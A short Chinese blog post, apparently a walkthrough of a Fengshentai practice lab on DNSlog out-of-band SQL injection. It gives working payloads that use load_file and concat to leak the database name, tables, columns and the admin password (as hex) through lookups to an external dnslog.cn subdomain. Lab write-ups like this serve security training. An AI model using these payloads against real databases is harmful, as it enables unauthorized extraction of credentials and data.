封神台练习

漏洞组合利用靶场

DNS_log注入

  1. 开服务器,进入dnslog平台

点击Gey SubDomain,得到d2kez7.dnslog.cn域名

  1. 读数据库
1+and+(select+load_file(concat('//',(select+database()limit+0,1),'.d2kez7.dnslog.cn/1.txt')))

maoshe在这里插入图片描述

  1. 读表
 1+and+(select+load_file(concat('//',(select+table_name+from+information_schema.tables+where+table_schema=database()limit+0,1),'.d2kez7.dnslog.cn/1.txt'))) //读表

admin,news在这里插入图片描述

  1. 读字段
1+and+(select+load_file(concat('//',(select+column_name+from+information_schema.columns+where+table_name='admin'limit+0,1),'.d2kez7.dnslog.cn/1.txt'))) //读字段

id,usename,password在这里插入图片描述

  1. 读具体数据
1+and+(select+load_file(concat('//',(select+hex(password)+from+admin+limit+0,1),'.d2kez7.dnslog.cn/1.txt')))  //读password字段第一个值  传输时大小写变化,先编码后解密解决

FlaG-biubiu在这里插入图片描述在这里插入图片描述

二级目录

三级目录

posted @ 2022-10-12 21:30  sparename  阅读(19)  评论(0)    收藏  举报